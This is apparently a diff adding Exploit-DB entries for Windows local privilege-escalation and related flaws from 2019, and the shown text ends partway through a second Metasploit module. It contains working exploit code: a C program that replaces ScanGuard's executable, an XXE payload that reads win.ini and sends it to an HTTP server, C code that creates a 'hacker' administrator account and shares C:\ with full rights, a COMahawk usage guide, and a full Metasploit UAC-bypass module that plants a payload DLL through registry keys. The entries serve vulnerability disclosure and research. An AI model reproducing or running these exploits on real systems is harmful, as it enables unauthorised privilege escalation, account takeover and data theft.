+The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
+This can allow low integrity malware the ability to replace ScanGuard executables.
+
+
+C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F 
+                                      Everyone:(OI)(CI)(ID)F       
+                                      NT SERVICE\TrustedInstaller:(ID)F 
+                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F 
+                                      NT AUTHORITY\SYSTEM:(ID)F 
+
+
+[Exploit/POC]
+
+#include <stdio.h>
+#include <windows.h>
+#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
+#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"
+
+/* ScanGuard EoP 
+  PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+  DWORD dwAttrib = GetFileAttributes(szPath);
+  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+   
+  if(!FileExists(DISABLED_TARGET)){
+    rename(TARGET, DISABLED_TARGET);
+    printf("[+] ScanGuard Antivirus EoP PoC\n");
+    Sleep(300);
+    printf("[+] Disabled ScanGuard.exe ...\n");
+    Sleep(300);
+  }else{
+  	PWNED=TRUE;
+  }
+   
+  char fname[MAX_PATH];
+  char newLoc[]=TARGET;
+  
+  DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+  if (size){
+     if(!PWNED){
+        printf("[+] Copying exploit to vuln dir...\n");
+        Sleep(300);
+        CopyFile(fname, newLoc, FALSE);
+        printf("[+] Replaced legit ScanGuard...\n");
+        Sleep(300);
+        printf("[+] Done!\n");
+        Sleep(300);
+        MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
+        Sleep(2000);
+        exit(0);
+     }else{
+     	if(FileExists("ScamGuard.lnk")){
+	    system("DEL /f ScamGuard.lnk");
+	   }
+     	printf("[+] ScamGuard PWNED!!!");
+     	printf("[+] By hyp3rlinx\n");
+     	system("pause");
+     }
+  }
+}
+
+
+[Disclosure Timeline]
+Vendor Notification: September 16, 2019
+Received vendor acknowledgement: September 16, 2019
+Second contact follow up: September 29, 2019
+No more vendor replies.
+November 12, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47658.txt b/exploits/windows/local/47658.txt
new file mode 100644
index 000000000..2399d68ef
--- /dev/null
+++ b/exploits/windows/local/47658.txt
@@ -0,0 +1,28 @@
+# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
+# Author: Pablo Santiago
+# Date: 2019-11-13
+# Vendor Homepage: https://www.oxygenxml.com/
+# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
+# Version: 21.1.1
+# CVE : N/A
+# Tested on: Windows 7
+
+#PoC
+
+1- python -m SimpleHTTPServer 8000
+1.1- Poc.xml :
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+1.2.- payload.dtd
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+2- File -> Open -> *.xml
+
+#PoC Visual
+https://imgur.com/2H8DhL9
\ No newline at end of file
diff --git a/exploits/windows/local/47660.txt b/exploits/windows/local/47660.txt
new file mode 100644
index 000000000..27b775be0
--- /dev/null
+++ b/exploits/windows/local/47660.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
+# Date: 2019-11-14
+# Exploit Author: D.Goedecke
+# Vendor Homepage: www.shrew.net
+# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
+# Version: 2.2.2
+# Tested on: Windows 10 64bit
+
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+ShrewSoft IKE Daemon iked                                        C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto
+ShrewSoft IPSEC Daemon ipsecd                                    C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto 
+
+
+C:\Users\user>sc qc iked
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: iked
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ShrewSoft IKE Daemon
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\user>sc qc ipsecd
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ipsecd
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ShrewSoft IPSEC Daemon
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem 
+
+
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47661.txt b/exploits/windows/local/47661.txt
new file mode 100644
index 000000000..eb48cecd0
--- /dev/null
+++ b/exploits/windows/local/47661.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-17
+# Vendor Homepage: https://www.emerson.com/en-us
+# Software Link : https://www.opertek.com/descargar-software/?prc=_326
+# Tested Version: 9.70 Build 8595
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """
+
+FxControl Runtime	FxControlRuntime	C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe	Auto
+
+# Service info:
+
+C:\>sc qc FxControlRuntime
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FxControlRuntime
+        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : FxControl Runtime
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47664.txt b/exploits/windows/local/47664.txt
new file mode 100644
index 000000000..992edb18f
--- /dev/null
+++ b/exploits/windows/local/47664.txt
@@ -0,0 +1,31 @@
+# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
+# Date: 2019-11-16
+# Exploit Author : Olimpia Saucedo
+# Vendor Homepage: www.asus.com
+# Version:  1.00.31
+# Tested on: Windows 10 Pro x64  (but it should works on all windows version)
+ 
+The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
+This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
+ 
+POC:
+
+>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ASUS HM Com Service      asHmComSvc
+C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
+Auto
+
+>sc qc "asHMComSvc"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHMComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS HM Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47667.txt b/exploits/windows/local/47667.txt
new file mode 100644
index 000000000..e85cbef83
--- /dev/null
+++ b/exploits/windows/local/47667.txt
@@ -0,0 +1,102 @@
+# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
+# Exploit Author: ZwX
+# Exploit Date: 2019-11-15
+# Vendor Homepage : https://www.wondershare.net/
+# Software Link: https://www.wondershare.net/mobilego/
+# Tested on OS: Windows 7 
+
+
+# Proof of Concept (PoC):
+==========================
+C:\Program Files\Wondershare\MobileGo>icacls *.exe
+adb.exe Everyone:(I)(F)
+        AUTORITE NT\Système:(I)(F)
+        BUILTIN\Administrateurs:(I)(F)
+        BUILTIN\Utilisateurs:(I)(RX)
+
+APKInstaller.exe Everyone:(I)(F)
+        AUTORITE NT\Système:(I)(F)
+        BUILTIN\Administrateurs:(I)(F)
+        BUILTIN\Utilisateurs:(I)(RX)
+
+BsSndRpt.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+DriverInstall.exe Everyone:(I)(F)
+                  AUTORITE NT\Système:(I)(F)
+                  BUILTIN\Administrateurs:(I)(F)
+                  BUILTIN\Utilisateurs:(I)(RX)
+
+fastboot.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+FetchDriver.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+
+MGNotification.exe Everyone:(I)(F)
+                   AUTORITE NT\Système:(I)(F)
+                   BUILTIN\Administrateurs:(I)(F)
+                   BUILTIN\Utilisateurs:(I)(RX)
+
+MobileGo.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+MobileGoService.exe Everyone:(I)(F)
+                    AUTORITE NT\Système:(I)(F)
+                    BUILTIN\Administrateurs:(I)(F)
+                    BUILTIN\Utilisateurs:(I)(RX)
+
+unins000.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+URLReqService.exe Everyone:(I)(F)
+                  AUTORITE NT\Système:(I)(F)
+                  BUILTIN\Administrateurs:(I)(F)
+                  BUILTIN\Utilisateurs:(I)(RX)
+
+WAFSetup.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+WsConverter.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+
+WsMediaInfo.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+				
+				
+				
+#Exploit code(s): 
+=================
+
+1) Compile below 'C' code name it as "MobileGo.exe"
+
+#include<windows.h>
+
+int main(void){
+ system("net user hacker abc123 /add");
+ system("net localgroup Administrators hacker  /add");
+ system("net share SHARE_NAME=c:\ /grant:hacker,full");
+ WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
+return 0;
+} 
+
+2) Rename original "MobileGo.exe" to "~MobileGo.exe"
+3) Place our malicious "MobileGo.exe" in the MobileGo directory
+4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. 
+Privilege Successful Escalation
\ No newline at end of file
diff --git a/exploits/windows/local/47668.txt b/exploits/windows/local/47668.txt
new file mode 100644
index 000000000..e04634888
--- /dev/null
+++ b/exploits/windows/local/47668.txt
@@ -0,0 +1,85 @@
+# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
+# Date: 2019-11-17
+# Exploit Author: Akif Mohamed Ik
+# Vendor Homepage: http://software.ncp-e.com/
+# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
+# Version: 9.2x
+# Tested on: Windows 7 SP1
+# CVE : NA
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ncprwsnt                                                        ncprwsnt
+                C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
+                           Auto
+rwsrsu                                                          rwsrsu
+                C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
+                           Auto
+ncpclcfg                                                        ncpclcfg
+                C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
+                           Auto
+NcpSec                                                          NcpSec
+                C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
+                           Auto
+						   
+C:\Users\ADMIN>sc qc ncprwsnt					   
+[SC] QueryServiceConfig SUCCESS	
+		SERVICE_NAME: ncprwsnt
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ncprwsnt
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\ADMIN>sc qc rwsrsu
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : rwsrsu
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : rwsrsu
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+		
+C:\Users\ADMIN>sc qc ncpclcfg
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : ncpclcfg
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ncpclcfg
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem		
+		
+C:\Users\ADMIN>sc qc NcpSec
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : NcpSec
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NcpSec
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+		
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47675.txt b/exploits/windows/local/47675.txt
new file mode 100644
index 000000000..45593f6f8
--- /dev/null
+++ b/exploits/windows/local/47675.txt
@@ -0,0 +1,25 @@
+#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-18
+#Vendor Homepage : https://www.filehorse.com/
+#Link Software : https://www.filehorse.com/download-bartvpn/
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc BartVPNService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: BartVPNService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : BartVPNService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47676.txt b/exploits/windows/local/47676.txt
new file mode 100644
index 000000000..cfee63b82
--- /dev/null
+++ b/exploits/windows/local/47676.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
+# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
+# Rockwell Automation Technologies
+# Tested Version: 30.01.00
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """
+
+FactoryTalk Activation Service		FactoryTalk Activation Service 		C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe	Auto
+
+# Service info:
+
+C:\>sc qc "FactoryTalk Activation Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FactoryTalk Activation Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : FactoryTalk Activation Service
+        DEPENDENCIES       : winmgmt
+                           : wmiapsrv
+                           : +NetworkProvider
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47684.md b/exploits/windows/local/47684.md
new file mode 100644
index 000000000..f60854ba0
--- /dev/null
+++ b/exploits/windows/local/47684.md
@@ -0,0 +1,43 @@
+## EDB Note
+Download:
+- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe
+- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip
+
+
+# COMahawk
+**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**
+
+## Video Demo
+https://vimeo.com/373051209
+
+## Usage
+
+### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)
+
+1. Run COMahawk.exe
+2. ???
+3. Hopefully profit
+
+or
+
+1. COMahawk.exe "custom command to run" (ie. COMahawk.exe "net user /add test123 lol123 &")
+2. ???
+3. Hopefully profit
+
+## Concerns
+**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**
+
+However, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.
+
+Also, since you are executing from a service - you most likely cannot spawn any Window hence all command will be "GUI-less". Maybe different session? Idk, it is too late and I am tired haha.
+
+## Credits:
+https://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop
+
+https://twitter.com/TomahawkApt69 for being the mental support and motivation
+
+and most of all:
+
+https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
+
+for discovering and publishing the write up. 100% of the credit goes here.
\ No newline at end of file
diff --git a/exploits/windows/local/47695.rb b/exploits/windows/local/47695.rb
new file mode 100755
index 000000000..1966ec60e
--- /dev/null
+++ b/exploits/windows/local/47695.rb
@@ -0,0 +1,210 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
+      'Description'   => %q(
+      Microsoft Windows allows for the automatic loading of a profiling COM object during
+      the launch of a CLR process based on certain environment variables ostensibly to
+      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
+      that will be launched as the profiling thread.  This thread will run at the permission
+      level of the calling process, so an auto-elevating process will launch the DLL with
+      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
+      process, but others would work, too.
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Casey Smith',   # UAC bypass discovery and research
+          '"Stefan Kanthak" <stefan.kanthak () nexgo de>',   # UAC bypass discovery and research
+          'bwatters-r7', # Module
+        ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes'         =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+      'References'    =>
+        [
+          ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
+          ['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
+        ],
+      'DisclosureDate' => 'Mar 17 2017'
+      )
+    )
+    register_options(
+      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
+    )
+
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def write_reg_value(registry_hash)
+    vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
+    begin
+      if not registry_key_exist?(registry_hash[:key_name])
+        registry_createkey(registry_hash[:key_name])
+        registry_hash[:delete_on_cleanup] = true
+      else
+        registry_hash[:delete_on_cleanup] = false
+      end
+      registry_setvaldata(registry_hash[:key_name], \
+                          registry_hash[:value_name], \
+                          registry_hash[:value_value], \
+                          registry_hash[:value_type])
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error(e.to_s)
+    end
+  end
+
+  def remove_reg_value(registry_hash)
+    # we may have already deleted the key
+    return unless registry_key_exist?(registry_hash[:key_name])
+    begin
+      if registry_hash[:delete_on_cleanup]
+        vprint_status("Deleting #{registry_hash[:key_name]} key")
+        registry_deletekey(registry_hash[:key_name])
+      else
+        vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")
+        registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
+      end
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_bad("Unable to clean up registry")
+      print_error(e.to_s)
+    end
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    # get directory locations straight
+    win_dir = session.sys.config.getenv('windir')
+    vprint_status("win_dir = " + win_dir)
+    tmp_dir = session.sys.config.getenv('tmp')
+    vprint_status("tmp_dir = " + tmp_dir)
+    exploit_dir = win_dir + "\\System32\\"
+    vprint_status("exploit_dir = " + exploit_dir)
+    target_filepath = exploit_dir + "gpedit.msc"
+    vprint_status("target_filepath = " + target_filepath)
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
+    payload_pathname = tmp_dir + '\\' + payload_name
+
+    # make payload
+    vprint_status("Making Payload")
+    vprint_status("payload_pathname = " + payload_pathname)
+    payload = generate_payload_dll
+
+    uuid = SecureRandom.uuid
+    vprint_status("UUID = #{uuid}")
+    reg_keys = []
+    # This reg key will not hurt anything in windows 10+, but is not required.
+    unless sysinfo['OS'] =~ /Windows (2016|10)/
+      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+                    value_name: '',
+                    value_type: "REG_EXPAND_SZ",
+                    value_value: payload_pathname,
+                    delete_on_cleanup: false)
+    end
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_PROFILER",
+                  value_type: "REG_SZ",
+                  value_value: "{#{uuid}}",
+                  delete_on_cleanup: false)
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_ENABLE_PROFILING",
+                  value_type: "REG_SZ",
+                  value_value: "1",
+                  delete_on_cleanup: false)
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_PROFILER_PATH",
+                  value_type: "REG_SZ",
+                  value_value: payload_pathname,
+                  delete_on_cleanup: false)
+    reg_keys.each do |key_hash|
+      write_reg_value(key_hash)
+    end
+
+    # Upload payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+
+    vprint_status("Launching " + target_filepath)
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error(e.to_s)
+    end
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    # wait for a few seconds before cleaning up
+    print_status("Please wait for session and cleanup....")
+    sleep(20)
+    vprint_status("Removing Registry Changes")
+    reg_keys.each do |key_hash|
+      remove_reg_value(key_hash)
+    end
+    vprint_status("Registry Changes Removed")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47696.rb b/exploits/windows/local/47696.rb
new file mode 100755
index 000000000..110dadb82
--- /dev/null
+++ b/exploits/windows/local/47696.rb
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)',
+      'Description'   => %q(
+        This module will bypass Windows UAC by hijacking a special key in the Registry under
+        the current user hive, and inserting a custom command that will get invoked when
+        Window backup and restore is launched. It will spawn a second shell that has the UAC
+        flag turned off.
+
+        This module modifies a registry key, but cleans up the key once the payload has
+        been invoked.
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'enigma0x3',   # UAC bypass discovery and research
+          'bwatters-r7', # Module
+        ],
